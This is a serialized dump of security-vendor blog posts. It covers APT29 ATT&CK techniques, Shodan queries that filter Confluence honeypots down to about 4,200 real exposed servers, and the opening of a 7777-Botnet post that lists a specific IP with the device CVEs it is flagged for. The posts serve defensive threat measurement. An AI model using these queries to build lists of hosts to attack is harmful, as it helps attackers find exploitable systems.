\"defense-evasion\"\n ]\n",[886,80631,80632,80645,80664,80676,80686,80696,80706,80716,80725,80729,80748,80761,80766,80786,80806,80826,80846,80859,80868,80873,80877,80881,80900,80919,80931,80940,80944,80948,80952,80970,80988,81006,81025,81037,81045],{"__ignoreMap":219},[1373,80633,80634,80636,80639,80641,80643],{"class":1375,"line":1376},[1373,80635,23732],{"class":1387},[1373,80637,80638],{"class":1391},"mitre_attack_group",[1373,80640,183],{"class":1387},[1373,80642,20051],{"class":4640},[1373,80644,8904],{"class":1383},[1373,80646,80647,80649,80651,80653,80655,80657,80660,80662],{"class":1375,"line":220},[1373,80648,19050],{"class":9152},[1373,80650,30774],{"class":9155},[1373,80652,183],{"class":9152},[1373,80654,4606],{"class":1383},[1373,80656,4883],{"class":9173},[1373,80658,80659],{"class":9176},"APT29",[1373,80661,183],{"class":9173},[1373,80663,9062],{"class":1383},[1373,80665,80666,80668,80670,80672,80674],{"class":1375,"line":1266},[1373,80667,19050],{"class":9152},[1373,80669,43489],{"class":9155},[1373,80671,183],{"class":9152},[1373,80673,4606],{"class":1383},[1373,80675,26352],{"class":1383},[1373,80677,80678,80680,80682,80684],{"class":1375,"line":1852},[1373,80679,26357],{"class":9173},[1373,80681,80659],{"class":9176},[1373,80683,183],{"class":9173},[1373,80685,9062],{"class":1383},[1373,80687,80688,80690,80692,80694],{"class":1375,"line":4692},[1373,80689,26357],{"class":9173},[1373,80691,80268],{"class":9176},[1373,80693,183],{"class":9173},[1373,80695,9062],{"class":1383},[1373,80697,80698,80700,80702,80704],{"class":1375,"line":4724},[1373,80699,26357],{"class":9173},[1373,80701,80235],{"class":9176},[1373,80703,183],{"class":9173},[1373,80705,9062],{"class":1383},[1373,80707,80708,80710,80712,80714],{"class":1375,"line":4756},[1373,80709,26357],{"class":9173},[1373,80711,79494],{"class":9176},[1373,80713,183],{"class":9173},[1373,80715,9062],{"class":1383},[1373,80717,80718,80720,80723],{"class":1375,"line":4768},[1373,80719,26357],{"class":9173},[1373,80721,80722],{"class":9176},"CozyDuke",[1373,80724,19057],{"class":9173},[1373,80726,80727],{"class":1375,"line":4792},[1373,80728,26366],{"class":1383},[1373,80730,80731,80733,80735,80737,80739,80741,80744,80746],{"class":1375,"line":4798},[1373,80732,19050],{"class":9152},[1373,80734,79737],{"class":9155},[1373,80736,183],{"class":9152},[1373,80738,4606],{"class":1383},[1373,80740,4883],{"class":9173},[1373,80742,80743],{"class":9176},"APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015. ",[1373,80745,183],{"class":9173},[1373,80747,9062],{"class":1383},[1373,80749,80750,80752,80755,80757,80759],{"class":1375,"line":4806},[1373,80751,19050],{"class":9152},[1373,80753,80754],{"class":9155},"techniques",[1373,80756,183],{"class":9152},[1373,80758,4606],{"class":1383},[1373,80760,26352],{"class":1383},[1373,80762,80763],{"class":1375,"line":4817},[1373,80764,80765],{"class":1383}," {\n",[1373,80767,80768,80770,80773,80775,80777,80779,80782,80784],{"class":1375,"line":4825},[1373,80769,28414],{"class":9152},[1373,80771,80772],{"class":9165},"technique_id",[1373,80774,183],{"class":9152},[1373,80776,4606],{"class":1383},[1373,80778,4883],{"class":9173},[1373,80780,80781],{"class":9176},"T1001",[1373,80783,183],{"class":9173},[1373,80785,9062],{"class":1383},[1373,80787,80788,80790,80793,80795,80797,80799,80802,80804],{"class":1375,"line":4835},[1373,80789,28414],{"class":9152},[1373,80791,80792],{"class":9165},"technique_name",[1373,80794,183],{"class":9152},[1373,80796,4606],{"class":1383},[1373,80798,4883],{"class":9173},[1373,80800,80801],{"class":9176},"Data Obfuscation",[1373,80803,183],{"class":9173},[1373,80805,9062],{"class":1383},[1373,80807,80808,80810,80813,80815,80817,80819,80822,80824],{"class":1375,"line":4843},[1373,80809,28414],{"class":9152},[1373,80811,80812],{"class":9165},"sub_technique",[1373,80814,183],{"class":9152},[1373,80816,4606],{"class":1383},[1373,80818,4883],{"class":9173},[1373,80820,80821],{"class":9176},"002",[1373,80823,183],{"class":9173},[1373,80825,9062],{"class":1383},[1373,80827,80828,80830,80833,80835,80837,80839,80842,80844],{"class":1375,"line":4849},[1373,80829,28414],{"class":9152},[1373,80831,80832],{"class":9165},"sub_technique_name",[1373,80834,183],{"class":9152},[1373,80836,4606],{"class":1383},[1373,80838,4883],{"class":9173},[1373,80840,80841],{"class":9176},"Steganography",[1373,80843,183],{"class":9173},[1373,80845,9062],{"class":1383},[1373,80847,80848,80850,80853,80855,80857],{"class":1375,"line":4877},[1373,80849,28414],{"class":9152},[1373,80851,80852],{"class":9165},"tactic",[1373,80854,183],{"class":9152},[1373,80856,4606],{"class":1383},[1373,80858,26352],{"class":1383},[1373,80860,80861,80863,80866],{"class":1375,"line":4915},[1373,80862,28875],{"class":9173},[1373,80864,80865],{"class":9176},"command-and-control",[1373,80867,19057],{"class":9173},[1373,80869,80870],{"class":1375,"line":4931},[1373,80871,80872],{"class":1383}," ]\n",[1373,80874,80875],{"class":1375,"line":4947},[1373,80876,28468],{"class":1383},[1373,80878,80879],{"class":1375,"line":4952},[1373,80880,80765],{"class":1383},[1373,80882,80883,80885,80887,80889,80891,80893,80896,80898],{"class":1375,"line":6776},[1373,80884,28414],{"class":9152},[1373,80886,80772],{"class":9165},[1373,80888,183],{"class":9152},[1373,80890,4606],{"class":1383},[1373,80892,4883],{"class":9173},[1373,80894,80895],{"class":9176},"T1027",[1373,80897,183],{"class":9173},[1373,80899,9062],{"class":1383},[1373,80901,80902,80904,80906,80908,80910,80912,80915,80917],{"class":1375,"line":6781},[1373,80903,28414],{"class":9152},[1373,80905,80792],{"class":9165},[1373,80907,183],{"class":9152},[1373,80909,4606],{"class":1383},[1373,80911,4883],{"class":9173},[1373,80913,80914],{"class":9176},"Obfuscated Files or Information",[1373,80916,183],{"class":9173},[1373,80918,9062],{"class":1383},[1373,80920,80921,80923,80925,80927,80929],{"class":1375,"line":7524},[1373,80922,28414],{"class":9152},[1373,80924,80852],{"class":9165},[1373,80926,183],{"class":9152},[1373,80928,4606],{"class":1383},[1373,80930,26352],{"class":1383},[1373,80932,80933,80935,80938],{"class":1375,"line":7530},[1373,80934,28875],{"class":9173},[1373,80936,80937],{"class":9176},"defense-evasion",[1373,80939,19057],{"class":9173},[1373,80941,80942],{"class":1375,"line":7546},[1373,80943,80872],{"class":1383},[1373,80945,80946],{"class":1375,"line":7571},[1373,80947,28468],{"class":1383},[1373,80949,80950],{"class":1375,"line":7598},[1373,80951,80765],{"class":1383},[1373,80953,80954,80956,80958,80960,80962,80964,80966,80968],{"class":1375,"line":7615},[1373,80955,28414],{"class":9152},[1373,80957,80772],{"class":9165},[1373,80959,183],{"class":9152},[1373,80961,4606],{"class":1383},[1373,80963,4883],{"class":9173},[1373,80965,80895],{"class":9176},[1373,80967,183],{"class":9173},[1373,80969,9062],{"class":1383},[1373,80971,80972,80974,80976,80978,80980,80982,80984,80986],{"class":1375,"line":7635},[1373,80973,28414],{"class":9152},[1373,80975,80792],{"class":9165},[1373,80977,183],{"class":9152},[1373,80979,4606],{"class":1383},[1373,80981,4883],{"class":9173},[1373,80983,80914],{"class":9176},[1373,80985,183],{"class":9173},[1373,80987,9062],{"class":1383},[1373,80989,80990,80992,80994,80996,80998,81000,81002,81004],{"class":1375,"line":7640},[1373,80991,28414],{"class":9152},[1373,80993,80812],{"class":9165},[1373,80995,183],{"class":9152},[1373,80997,4606],{"class":1383},[1373,80999,4883],{"class":9173},[1373,81001,80821],{"class":9176},[1373,81003,183],{"class":9173},[1373,81005,9062],{"class":1383},[1373,81007,81008,81010,81012,81014,81016,81018,81021,81023],{"class":1375,"line":7648},[1373,81009,28414],{"class":9152},[1373,81011,80832],{"class":9165},[1373,81013,183],{"class":9152},[1373,81015,4606],{"class":1383},[1373,81017,4883],{"class":9173},[1373,81019,81020],{"class":9176},"Software Packing",[1373,81022,183],{"class":9173},[1373,81024,9062],{"class":1383},[1373,81026,81027,81029,81031,81033,81035],{"class":1375,"line":7672},[1373,81028,28414],{"class":9152},[1373,81030,80852],{"class":9165},[1373,81032,183],{"class":9152},[1373,81034,4606],{"class":1383},[1373,81036,26352],{"class":1383},[1373,81038,81039,81041,81043],{"class":1375,"line":7688},[1373,81040,28875],{"class":9173},[1373,81042,80937],{"class":9176},[1373,81044,19057],{"class":9173},[1373,81046,81047],{"class":1375,"line":7709},[1373,81048,80872],{"class":1383},[61,81050,81052],{"id":81051},"expanding-vendors-products","Expanding Vendors \u002F Products",[18,81054,81055],{},"Lastly, we will pull the vendors and products associated with the CVEs we learned about to create a colorful data visualization that will catch the attention of any CISO \u002F Board. And that completes the threat actor profile… for now!",[18,81057,81058],{},[68,81059],{":width":10862,"alt":79444,"src":79445},[61,81061,81063],{"id":81062},"a-new-view-into-threat-actors","A New View into Threat Actors",[18,81065,81066],{},"We’ve gracefully been able to shift the threat actor narrative here from a fear-driven approach associated with threat actors to one that orients around data rather than fictional characters. In the future, I would like to expand on this example profile with additional context pivoting across other data sources associated with vulnerabilities and suspected victims. We can learn about the threat actors from the treasure trove of data I’ve discovered since starting at VulnCheck. It also fits perfectly into a PowerPoint slide deck to share at your next leadership meeting.",[61,81068,202],{"id":201},[18,81070,73826,81071,217],{},[47,81072,216],{"href":214,"rel":81073},[51],[2901,81075,81076],{},"html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}",{"title":219,"searchDepth":220,"depth":220,"links":81078},[81079,81080,81081,81082,81083,81084,81085],{"id":79460,"depth":220,"text":79461},{"id":79699,"depth":220,"text":79700},{"id":80376,"depth":220,"text":80377},{"id":80613,"depth":220,"text":80614},{"id":81051,"depth":220,"text":81052},{"id":81062,"depth":220,"text":81063},{"id":201,"depth":220,"text":202},"2024-02-15",{"slug":81088},"how-we-think-about-threat-actors","\u002Fblog\u002Fhow-we-think-about-threat-actors",{"title":79426,"description":79448},"blog\u002Fhow-we-think-about-threat-actors",[1280],"rjFj8rJWt1Hpy6g1Hv_4CJBjvo8HI_OZkAvHjz1dyeg",{"id":81095,"title":58291,"articles":81096,"authors":81126,"body":81128,"date":81101,"description":81327,"extension":234,"image":7,"link":7,"meta":81328,"navigation":237,"path":81329,"seo":81330,"series":7,"stem":81331,"subtype":7,"tags":81332,"__hash__":81333},"blog\u002Fblog\u002Ftoo-many-honeypots.md",[81097,81102,81106,81110,81114,81119,81122],{"title":81098,"source":81099,"link":81100,"date":81101},"Report finds excessive honeypots are spoiling cybersecurity data accuracy","SiliconANGLE","https:\u002F\u002Fsiliconangle.com\u002F2024\u002F02\u002F02\u002Freport-finds-excessive-honeypots-spoiling-cybersecurity-data-accuracy\u002F","2024-02-02",{"title":81103,"source":61436,"link":81104,"date":81105},"Risky Biz News: Two Iranian cyber groups get doxed in a week","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Ftwo-iranian-cyber-groups-doxed-in-a-week?utm_source=post-email-title&publication_id=852612&post_id=141371768&utm_campaign=email-post-title&isFreemail=true&r=2rnh0k&utm_medium=email","2024-02-05",{"title":81107,"source":11233,"link":81108,"date":81109},"Overabundant honeypots present cyber data accuracy challenges","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Foverabundant-honeypots-present-cyber-data-accuracy-challenges","2024-02-06",{"title":81111,"source":63100,"link":81112,"date":81113},"Shim Shady and Algorithm Lovers – PSW #816","https:\u002F\u002Fwww.scmagazine.com\u002Fpodcast-segment\u002F12481-shim-shady-and-algorithm-lovers-psw-816","2024-02-07",{"title":81115,"source":81116,"link":81117,"date":81118},"THIS WEEK IN SECURITY: BROKEN SHIMS, LASSPASS, AND TOOTHBRUSHES?","Hackaday","https:\u002F\u002Fhackaday.com\u002F2024\u002F02\u002F09\u002Fthis-week-in-security-broken-shims-lasspass-and-toothbrushes\u002F","2024-02-09",{"title":81120,"source":14378,"link":81121,"date":81118},"In Other News: $350 Million Google Settlement, AI-Powered Fraud, Cybersecurity Funding","https:\u002F\u002Fwww.securityweek.com\u002Fin-other-news-350-million-google-settlement-ai-powered-fraud-cybersecurity-funding\u002F",{"title":81123,"source":14378,"link":81124,"date":81125},"Recent Zero-Day Could Impact Up to 97,000 Microsoft Exchange Servers","https:\u002F\u002Fwww.securityweek.com\u002Frecent-zero-day-could-impact-up-to-97000-microsoft-exchange-servers\u002F","2024-02-20",[81127],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":81129,"toc":81323},[81130,81136,81139,81142,81160,81166,81169,81175,81189,81192,81199,81204,81207,81213,81216,81222,81229,81235,81241,81247,81254,81260,81273,81279,81282,81288,81291,81297,81300,81306,81308,81315,81318,81320],[43656,81131,81133],{"author":3481,"link":81132},"https:\u002F\u002Fwww.theregister.com\u002F2023\u002F11\u002F08\u002Fatlassian_confluence_flaw_upgraded\u002F",[18,81134,81135],{},"According to Huntress Labs, a Shodan search for \"Confluence\" returns more than 200,000 results, and searches for the Confluence favicon return more than 5,000. These figures aren't an indication of the number of vulnerable instances, but do show how many are exposed to the internet.",[263,81137],{":list":81138,"ico":266,"title":58291},"[\"At the time of publication, there’s more than 235,000 internet-facing Confluence honeypots.\",\"There’s, at most, 4,000 real internet-facing Confluence servers.\",\"Filtering ~240,000 potential Confluence servers down to 4,000 hosts is not trivial but is important for understanding the potential impact of Confluence vulnerabilities.\"]",[18,81140,81141],{},"Determining the number of internet-facing hosts affected by a new vulnerability is a key factor in determining if it will become a widespread or emergent threat. Are there a lot of hosts affected? Pretty good possibility things are about to pop off. Only a few hosts? Probably less likely. But actually, counting those hosts has become quite a bit more challenging.",[18,81143,81144,81145,81149,81150,81153,81154,81159],{},"Take for example, ",[47,81146,22217],{"href":81147,"rel":81148},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-22527",[51]," affecting Atlassian Confluence. At the time of writing, Confluence has appeared on the CISA KEV list nine (yes, ",[295,81151,81152],{},"nine",") times. That’s a level of exploitation that should encourage everyone to get their Confluence servers off the internet. But let’s look for ourselves. There are a number of generic Confluence Shodan queries floating around, but ",[47,81155,81158],{"href":81156,"rel":81157},"https:\u002F\u002Fpentest-tools.com\u002Fblog\u002Fdetect-exploit-cve-2021-26084-confluence-server-rce#using-shodan",[51],"X-Confluence-Request-Time"," might be the most well known (this simply checks for an HTTP response header value):",[18,81161,81162],{},[68,81163],{":width":10862,"alt":81164,"src":81165},"X-Confluence-Request-Time Shodan Query","\u002Fblog\u002Ftoo-many-honeypots\u002Fx-confluence-request-time.png",[18,81167,81168],{},"241,000 hosts is a great target base for an emergent threat! But, on closer examination, there’s something off about the listed hosts. For example, this one has the Confluence “X-Confluence-Request-Time” header:",[18,81170,81171],{},[68,81172],{":width":10862,"alt":81173,"src":81174},"A honeypot pretending to be F5, Confluence, and QNAP","\u002Fblog\u002Ftoo-many-honeypots\u002Ff5-confluence-qnap.png",[18,81176,81177,81178,1255,81183,81188],{},"But it also has an F5 favicon, and it also claims to be a QNAP TS-128A. This is a honeypot. Whoever created this honeypot was somewhat clever. They mashed together the popular Shodan queries for Confluence, ",[47,81179,81182],{"href":81180,"rel":81181},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=http.favicon.hash%3A-335242539",[51],"F5 devices",[47,81184,81187],{"href":81185,"rel":81186},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=http.html_hash%3A-558771039",[51],"QNAP systems",", to create an abomination that would show up in all three queries.",[18,81190,81191],{},"To avoid throwing exploits all over the internet (and thus getting quickly caught), some attackers use Shodan (or similar) to curate target lists. This honeypot is optimized for this use case. Which is neat, but blocks our view of what is real. Can we filter them out of our search?",[18,81193,81194,81195,81198],{},"In a ",[47,81196,11046],{"href":74268,"rel":81197},[51]," about CVE-2023-22527, Project Discovery provides this Shodan query in a Nuclei template:",[1925,81200,81201],{},[18,81202,81203],{},"http.component:\"Atlassian Confluence\"",[18,81205,81206],{},"The result is significantly better than the “X-Confluence-Request-Time” query, but you can still see the 2nd and 3rd results are honeypots. So that won’t do.",[18,81208,81209],{},[68,81210],{":width":10862,"alt":81211,"src":81212},"Nuclei query","\u002Fblog\u002Ftoo-many-honeypots\u002Fnuclei.png",[18,81214,81215],{},"At this point, it’s probably useful to look at what a real Confluence server HTTP response looks like (this is actually after a 302 redirect, but let’s avoid that discussion):",[1354,81217,81220],{"className":81218,"code":81219,"language":1359,"meta":219},[1357],"HTTP\u002F1.1 200\nCache-Control: no-store\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\nX-Confluence-Request-Time: 1696956993845\nSet-Cookie: JSESSIONID=72D881CD92E61BE1394BB6231C28A68B; Path=\u002F; HttpOnly\nX-XSS-Protection: 1; mode=block\nX-Content-Type-Options: nosniff\nX-Frame-Options: SAMEORIGIN\nContent-Security-Policy: frame-ancestors 'self'\nX-Accel-Buffering: no\nContent-Encoding: gzip\nVary: User-Agent\nContent-Type: text\u002Fhtml;charset=UTF-8\nContent-Language: en-US\nTransfer-Encoding: chunked\nDate: Tue, 10 Oct 2023 16:56:33 GMT\n",[886,81221,81219],{"__ignoreMap":219},[18,81223,81224,81225,81228],{},"The server has a number of useful headers to key off of, but we’ll try to filter by adding in ",[886,81226,81227],{},"Set-Cookie: JSESSIONID=",". That update brings the host count down to nearly half of the Nuclei query.",[18,81230,81231],{},[68,81232],{":width":10862,"alt":81233,"src":81234},"Filter using JSESSIONID","\u002Fblog\u002Ftoo-many-honeypots\u002Fjsessionid.png",[18,81236,81237,81238,4606],{},"But still, there are so many honeypots! Almost all of which aren’t responding with an actual Confluence landing page. A simple way we can capitalize on that is to include a snippet from the Confluence login page in our query: ",[886,81239,81240],{},"html:\"confluence-base-url\"",[18,81242,81243],{},[68,81244],{":width":10862,"alt":81245,"src":81246},"Filter using confluence-base-url","\u002Fblog\u002Ftoo-many-honeypots\u002Fbaseurl.png",[18,81248,81249,81250,81253],{},"That does knock off ~17,000 hosts, and things are looking more ",[1131,81251,81252],{},"Confluency",". But there seems to be a whole bunch of entries without favicons. Let’s drill down into one and see…",[18,81255,81256],{},[68,81257],{":width":10862,"alt":81258,"src":81259},"Another damn honeypot","\u002Fblog\u002Ftoo-many-honeypots\u002Fits-a-honeypot.png",[18,81261,81262,81263,1246,81266,1255,81269,81272],{},"It’s a honeypot. This one is really well done. It looks just like a standard Confluence install, except it produces 302 redirects on the ",[886,81264,81265],{},".css",[886,81267,81268],{},".js",[886,81270,81271],{},"favicon"," requests.",[18,81274,81275],{},[68,81276],{":width":10862,"alt":81277,"src":81278},"Honeypot fail #1","\u002Fblog\u002Ftoo-many-honeypots\u002Fredirects.png",[18,81280,81281],{},"Unfortunately, Shodan doesn’t provide a good way to filter out hosts without favicon. Additionally, filtering on a known favicon is a non-starter because users can upload their own. So we have to find some other discrepancies in these honeypots in order to filter them out. Lucky for us, they have a few mistakes, but highlighted here is the most obvious:",[18,81283,81284],{},[68,81285],{":width":10862,"alt":81286,"src":81287},"Honeypot fail #2","\u002Fblog\u002Ftoo-many-honeypots\u002Freused-session.png",[18,81289,81290],{},"They all use the exact same JSESSIONID. Filter all those out, and we have the following:",[18,81292,81293],{},[68,81294],{":width":10862,"alt":81295,"src":81296},"The final Shodan query","\u002Fblog\u002Ftoo-many-honeypots\u002Ffinal.png",[18,81298,81299],{},"A quick investigation suggests that this could be the complete set of real Confluence hosts (or just very very good honeypots). That’s a reduction from 240,000 hosts all the way down to just 4,200. That means there are approximately 236,000 Confluence honeypots on the internet or more than 50 times the actual number of real Confluence servers.",[18,81301,81302],{},[68,81303],{":width":10862,"alt":81304,"src":81305},"Filtering for Confluence","\u002Fblog\u002Ftoo-many-honeypots\u002Fconfluence-servers-shodan.png",[61,81307,1903],{"id":1902},[18,81309,81310,81311,81314],{},"A vulnerability that only impacts 4,000 hosts is much less concerning than a vulnerability that impacts 240,000. Understanding the scale of an issue is important, and therefore, being precise about the number of potentially impacted hosts is important too. Those who copy overinflated statistics or haven’t done their due diligence are making vulnerabilities appear ",[295,81312,81313],{},"more"," impactful than they truly are.",[18,81316,81317],{},"While we focused on Confluence, this particular problem has been repeated across many different targets. Honeypots are a net good for the security community. But their expanding popularity does make understanding real-world attack surfaces much more difficult for defenders, not just attackers.",[61,81319,202],{"id":201},[18,81321,81322],{},"VulnCheck continuously monitors the internet for high-impact vulnerabilities and tracks the potential internet-facing attack surface. We pride ourselves on providing accurate and actionable information. All signal, no noise. To demo our data, create an account and request a trial today.",{"title":219,"searchDepth":220,"depth":220,"links":81324},[81325,81326],{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"VulnCheck faces a horde of honeypots while assessing the potential impact of Atlassian Confluence's CVE-2023-22527. This blog delves into Shodan queries to filter out honeypots and uncover the actual on-premise Confluence install base.",{},"\u002Fblog\u002Ftoo-many-honeypots",{"title":58291,"description":81327},"blog\u002Ftoo-many-honeypots",[23275],"G7B167qESzJTAgtdOWZ5UP8yTM3Qk-aOcTONCTi0c4Y",{"id":81335,"title":58279,"articles":81336,"authors":81343,"body":81345,"date":82166,"description":82167,"extension":234,"image":7,"link":7,"meta":82168,"navigation":237,"path":82170,"seo":82171,"series":7,"stem":82172,"subtype":7,"tags":82173,"__hash__":82174},"blog\u002Fblog\u002Fip-intel-7777-botnet.md",[81337,81340],{"title":81338,"source":23286,"link":81339,"date":68288},"Botnet 7777: Are You Betting on a Compromised Router?","https:\u002F\u002Fsecurityboulevard.com\u002F2024\u002F08\u002Fbotnet-7777-are-you-betting-on-a-compromised-router\u002F",{"title":81341,"source":14382,"link":81342,"date":64874},"Quad7 Botnet Expands to Target SOHO Routers and VPN Appliances","https:\u002F\u002Fthehackernews.com\u002F2024\u002F09\u002Fquad7-botnet-expands-to-target-soho.html",[81344],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":81346,"toc":82156},[81347,81350,81352,81378,81384,81388,81391,81916,81923,81929,81962,81979,81983,81991,81997,82036,82042,82045,82049,82078,82084,82087,82093,82110,82119,82123,82126,82129,82135,82138,82140,82143,82146,82150,82153],[263,81348],{":list":81349,"ico":266,"title":58279},"[\"7777-Botnet remains active, and VulnCheck used co-located services to theorize the botnet is infecting TP-Link, Xiongmai, and Hikvision devices using CVE-2017-7577, CVE-2018-10088, CVE-2022-45460, CVE-2021-36260, and\u002For CVE-2022-24355.\",\"The botnet also appears to infect other systems like MVPower, Zyxel NAS, and GitLab, although at a very low volume.\",\"The botnet doesn’t just start a service on port 7777. It also spins up a SOCKS5 server on port 11228.\"]",[61,81351,11648],{"id":11647},[18,81353,81354,81355,81362,81363,982,81368,81373,81374,59],{},"In October 2023, the 7777-Botnet was first discussed in a writeup titled, ",[1131,81356,81357],{},[47,81358,81361],{"href":81359,"rel":81360},"https:\u002F\u002Fgi7w0rm.medium.com\u002Fthe-curious-case-of-the-7777-botnet-86e3464c3ffd",[51],"The Curious Case of the 7777-Botnet",". The author, supported by other researchers, describes a ~10,000 node botnet that's purpose is to brute-force Microsoft Azure user credentials. It employs targeted, low-volume methods that are so effective that they were only discovered due to a geolocation login anomaly. The botnet’s targets include VIP users from organizations within the United States and Europe. Additionally, the writeup details loose links to the well-known threat actors ",[47,81364,81367],{"href":81365,"rel":81366},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Fscattered_spider",[51],"Scattered Spider",[47,81369,81372],{"href":81370,"rel":81371},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Flazarus_group",[51],"Lazarus",", based on reports from CrowdStrike and ReversingLabs respectively. The botnet, which has a fairly-distinct signature, remains ",[47,81375,5550],{"href":81376,"rel":81377},"https:\u002F\u002Ftrends.shodan.io\u002Fsearch?query=hash:1357418825%20port:7777#facet\u002Foverview",[51],[18,81379,81380],{},[68,81381],{":width":10862,"alt":81382,"src":81383},"7777-Botnet Trending on Shodan","\u002Fblog\u002Fip-intel-7777-botnet\u002F7777-botnet-trending.png",[61,81385,81387],{"id":81386},"xiongmai-infections","Xiongmai Infections",[18,81389,81390],{},"However, little is known about how the botnet infects new hosts. Looking through our IP intelligence data, we can see it co-located with software with known vulnerabilities. This can give us a good idea of the potential vulnerabilities that the botnet is using to infect new nodes. Take, for example, this 7777-Botnet installation on a Xiongmai device detailed in our IP-intelligence dataset:",[1354,81392,81394],{"className":22307,"code":81393,"language":22309,"meta":219,"style":219},"{\"ip\":\"1.34.97.9\",\"port\":7777,\"ssl\":false,\"lastSeen\":\"2024-01-15T13:08:10.811693\",\"asn\":\"AS3462\",\"country\":\"Taiwan\",\"country_code\":\"TW\",\"city\":\"Hsinchu\",\"cve\":[],\"matches\":[\"7777Botnet\"],\"hostnames\":[\"1-34-97-9.hinet-ip.hinet.net\"],\"type\":{\"id\":\"c2\",\"finding\":\"command and control infrastructure\"},\"feed_ids\":[\"e738e65a-6e88-4ad3-a922-55d32e57d4e7\"]}\n{\"ip\":\"1.34.97.9\",\"port\":81,\"ssl\":false,\"lastSeen\":\"2024-01-14T15:33:16.045105\",\"asn\":\"AS3462\",\"country\":\"Taiwan\",\"country_code\":\"TW\",\"city\":\"Hsinchu\",\"cve\":[\"CVE-2017-7577\",\"CVE-2018-10088\",\"CVE-2022-45460\"],\"matches\":[\"Xiongmai Path Traversal Credential Leak\",\"Xiongmai Authentication Buffer Overflow\",\"Xiongmai URI Buffer Overlow\"],\"hostnames\":[\"1-34-97-9.hinet-ip.hinet.net\"],\"type\":{\"id\":\"initial-access\",\"finding\":\"potentially 